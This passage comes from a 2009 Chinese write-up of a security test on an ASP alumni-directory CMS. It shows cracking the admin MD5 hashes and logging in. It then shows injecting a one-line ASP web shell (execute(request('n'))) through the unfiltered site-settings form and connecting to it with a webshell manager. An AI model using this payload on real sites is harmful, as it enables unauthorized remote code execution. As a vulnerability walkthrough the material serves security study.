不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测
2009-01-05 13:50:06 来源:WEB开发网CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
图19
2.破解密码并登录后台
把d42683b3df678c61和c39059a89ab77d84拿到www.cmd5.com去解密,密码分别是admin1和admin2。拿去登录后台,成功。如图20 所示。
CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
图20
这里不太明白,为什么开发者使用两个登录密码,而两个密码放在同一表里,这里对安全性并没有太大的提高。应该 把第二个密码使用其它加密方式单独写入一个asp文件中,这样安全性不是有更大的提高?
3.插入一句话后门
查看一下siteinfo.asp文件,此文件是网站的一些信息配置文件,而后台admin/siteinfo.asp 对此配置文件编辑时,并不会对表单的值进行过滤,就给攻击者在配置文件写入一句话木马的机会。在管理后台,点击 站点参数,在网址栏输入:http://"% ><%execute(request("n"))%><%',如图21所示。
CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
图21
4.使用Lanker的Webshell连接后台
使用lanker微型PHP+ASP管理器1.0双用版连接http://192.168.1.4/txl/siteinfo.asp,如图22所示,成功获得 Webshell,之后可以上传大马,做进一步提权渗透测试。
CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
- ››ASP.NET及JS中的cookie基本用法
- ››ASP.NET获取MS SQL Server安装实例
- ››asp.net实现调用百度pai 在线翻译英文转中文
- ››ASP.NET页面选项进行提示判断
- ››Asp.net定时执行程序
- ››ASP.NET中利用DataList实现图片无缝滚动
- ››ASP.NET验证控件RequiredFieldValidator
- ››ASP.NET中使用System.Net.Mail发邮件
- ››ASP.NET中获取用户控件中控件的ID
- ››ASP.NET中FileBytes写成文件并存档
- ››asp获取毫秒数
- ››asp.net报“INSERT INTO 语句的语法错误解决
更多精彩
赞助商链接